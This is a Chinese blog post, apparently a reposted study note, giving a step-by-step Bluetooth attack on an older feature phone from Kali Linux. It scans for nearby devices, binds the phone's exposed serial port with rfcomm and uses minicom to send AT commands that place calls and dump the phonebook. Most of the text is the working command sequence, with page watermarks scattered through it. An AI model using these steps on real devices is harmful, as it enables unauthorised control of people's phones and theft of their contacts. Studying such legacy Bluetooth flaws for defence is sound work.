首页 > 安全 > 网络安全 >

蓝牙安全1:通过低版本蓝牙渗透功能手机

2015-07-27

方法并非原创,均来自互联网,这里只是记录下笔者自己的操作过程,大神无视之~平台:kali_linux 因为kali自带很对安全审计工具,无需单独一个一个安装目标:某品牌功能手机 蓝牙版本

蓝牙安全1:通过低版本蓝牙渗透手机 - xiao106347 - 学习笔记

方法并非原创,均来自互联网,这里只是记录下笔者自己的操作过程,大神无视之~ 平台:kali_linux #因为kali自带很对安全审计工具,无需单独一个一个安装目标:某品牌功能手机 #蓝牙版本较低,有可利用的漏洞 准备: 因为攻击平台已经集成很多安全审计工具,这里只需要安装一个软件:minicomapt-get install minicom ok,开始工作!1.查看自己主机的蓝牙设备hciconfig #可以看到本机蓝牙设备为hci02.加载蓝牙设备hciconfig hcix up #加载本机蓝牙设备hci03.搜索周围的蓝牙设备hcitool -i hcix scan #搜索到一功能手机开了蓝牙功能(Fuck Me!)4.浏览目标设备所有可用服务sdptool browse mac #扫描目标蓝牙的mac 蓝牙安全1:通过低版本蓝牙渗透手机 - xiao106347 - 学习笔记 5.查看到目标蓝牙有“Serial Port0”,这正是这里所要利用的漏洞,这里频道为11;打开/etc/bluetooth/rfcomm.conf,去掉下面段的注释符,并修改device和channel与目标主机相同;保存退出!
蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记 6.与目标蓝牙设备建立映射:rfcomm bind /dev/rfcomm0 7.配置minicom: 输入minicom -m -s进入setup模式;选择Serial port setup:蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记 设置Serial Device 为/dev/rfcomm0 #这里与前面的映射设备相同
蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记 Save setup as dfl #回车保存Exit from Minicom #退出
蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记 8.开始控制目标手机:输入minicom -m #开始控制目标手机,此时目标手机会出现一个“串口已连接”的窗口一闪而过!
蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记 在该窗口输入atdt xxxxx(电话号码) #拨打电话输入at+cpbr=1,80 #显示目标手机电话簿,这里1为从第一个开始显示,80为到第80个结束显示蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记
更多功能按alt+z键! 蓝牙安全1:通过蓝牙渗透手机 - xiao106347 - 学习笔记
相关文章
最新文章
热点推荐